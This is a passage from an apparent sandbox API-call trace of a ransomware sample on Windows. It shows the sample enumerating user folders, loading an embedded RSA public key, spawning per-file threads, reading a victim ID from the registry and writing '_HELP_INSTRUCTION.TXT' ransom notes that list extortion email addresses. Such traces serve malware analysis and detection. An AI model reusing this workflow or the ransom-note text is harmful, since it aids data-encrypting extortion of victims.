9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0119.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0119.923] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0119.923] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.923] lstrcpyW (in: lpString1=0x179d3c, lpString2="oCadhb.wav" | out: lpString1="oCadhb.wav") returned="oCadhb.wav" [0119.923] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x584 [0119.923] Sleep (dwMilliseconds=0x96) [0120.110] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.110] lstrcmpW (lpString1="qEqtENZ.wav", lpString2="..") returned 1 [0120.110] lstrcmpW (lpString1="qEqtENZ.wav", lpString2=".") returned 1 [0120.110] StrStrW (lpFirst="qEqtENZ.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0120.110] StrStrW (lpFirst="qEqtENZ.wav", lpSrch="ntldr") returned 0x0 [0120.110] StrStrW (lpFirst="qEqtENZ.wav", lpSrch="NTLDR") returned 0x0 [0120.110] StrStrW (lpFirst="qEqtENZ.wav", lpSrch="NTDETECT.COM") returned 0x0 [0120.110] StrStrW (lpFirst="qEqtENZ.wav", lpSrch="ntdetect.com") returned 0x0 [0120.110] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0120.110] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0120.110] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0120.110] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.110] lstrcpyW (in: lpString1=0x179d3c, lpString2="qEqtENZ.wav" | out: lpString1="qEqtENZ.wav") returned="qEqtENZ.wav" [0120.110] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0120.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x580 [0120.110] Sleep (dwMilliseconds=0x96) [0120.295] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.295] lstrcmpW (lpString1="S9Jj_mVynZU911YcI-J0.wav", lpString2="..") returned 1 [0120.295] lstrcmpW (lpString1="S9Jj_mVynZU911YcI-J0.wav", lpString2=".") returned 1 [0120.295] StrStrW (lpFirst="S9Jj_mVynZU911YcI-J0.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0120.295] StrStrW (lpFirst="S9Jj_mVynZU911YcI-J0.wav", lpSrch="ntldr") returned 0x0 [0120.295] StrStrW (lpFirst="S9Jj_mVynZU911YcI-J0.wav", lpSrch="NTLDR") returned 0x0 [0120.295] StrStrW (lpFirst="S9Jj_mVynZU911YcI-J0.wav", lpSrch="NTDETECT.COM") returned 0x0 [0120.295] StrStrW (lpFirst="S9Jj_mVynZU911YcI-J0.wav", lpSrch="ntdetect.com") returned 0x0 [0120.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0120.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0120.296] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0120.296] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.296] lstrcpyW (in: lpString1=0x179d3c, lpString2="S9Jj_mVynZU911YcI-J0.wav" | out: lpString1="S9Jj_mVynZU911YcI-J0.wav") returned="S9Jj_mVynZU911YcI-J0.wav" [0120.296] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0120.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x57c [0120.296] Sleep (dwMilliseconds=0x96) [0120.483] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0120.483] FindClose (in: hFindFile=0x3a5b50 | out: hFindFile=0x3a5b50) returned 1 [0120.483] FindClose (in: hFindFile=0x3a5b50 | out: hFindFile=0x3a5b50) returned 0 [0120.484] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0120.484] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*" [0120.484] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0120.484] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0120.484] SetErrorMode (uMode=0x1) returned 0x1 [0120.484] wsprintfW (in: param_1=0x1792fc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\_HELP_INSTRUCTION.TXT") returned 96 [0120.484] GetUserNameW (in: lpBuffer=0x1770d8, pcbBuffer=0x176ec4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x176ec4) returned 1 [0120.484] wsprintfW (in: param_1=0x176ed0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0120.484] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x176ecc | out: phkResult=0x176ecc*=0x594) returned 0x0 [0120.484] RegQueryValueExW (in: hKey=0x594, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbc390, lpcbData=0x176ec8*=0x104 | out: lpType=0x0, lpData=0x3cbc390*=0x65, lpcbData=0x176ec8*=0x4a) returned 0x0 [0120.484] RegCloseKey (hKey=0x594) returned 0x0 [0120.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x1782fc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0120.485] wsprintfW (in: param_1=0x1772fc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0120.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0120.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x594 [0120.485] WriteFile (in: hFile=0x594, lpBuffer=0x1772fc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x1772f4, lpOverlapped=0x0 | out: lpBuffer=0x1772fc*, lpNumberOfBytesWritten=0x1772f4*=0x2c4, lpOverlapped=0x0) returned 1 [0120.486] CloseHandle (hObject=0x594) returned 1 [0120.486] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3a5b50 [0120.486] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="DqOPM" [0120.486] lstrcpyW (in: lpString1=0x179504, lpString2="DqOPM" | out: lpString1="DqOPM") returned="DqOPM" [0120.486] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0120.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0120.486] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0120.486] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.486] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.486] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.486] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.486] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0120.487] FindClose (in: hFindFile=0x3a5b50 | out: hFindFile=0x3a5b50) returned 1 [0120.487] FindClose (in: hFindFile=0x3a5b50 | out: hFindFile=0x3a5b50) returned 0 [0120.487] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0120.487] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0120.487] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0120.487] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0120.487] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0120.488] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0120.488] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0120.488] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.488] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.488] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.488] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.488] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.488] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.488] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0120.488] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0120.488] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0120.488] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.488] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0120.488] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0120.488] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0120.488] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0120.488] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0120.489] SetErrorMode (uMode=0x1) returned 0x1 [0120.489] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0120.489] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0120.489] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0120.489] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0120.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0120.489] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0120.489] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0120.489] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0120.489] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="Desktop") returned 0x0 [0120.489] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="DESKTOP") returned 0x0 [0120.489] SetErrorMode (uMode=0x1) returned 0x1 [0120.489] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\_HELP_INSTRUCTION.TXT") returned 64 [0120.489] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0120.490] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0120.490] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x598) returned 0x0 [0120.490] RegQueryValueExW (in: hKey=0x598, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbc5c0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbc5c0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0120.490] RegCloseKey (hKey=0x598) returned 0x0 [0120.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0120.490] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0120.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0120.490] CloseHandle (hObject=0x598) returned 1 [0120.490] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0120.491] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0120.491] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.491] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0120.491] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0120.491] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS 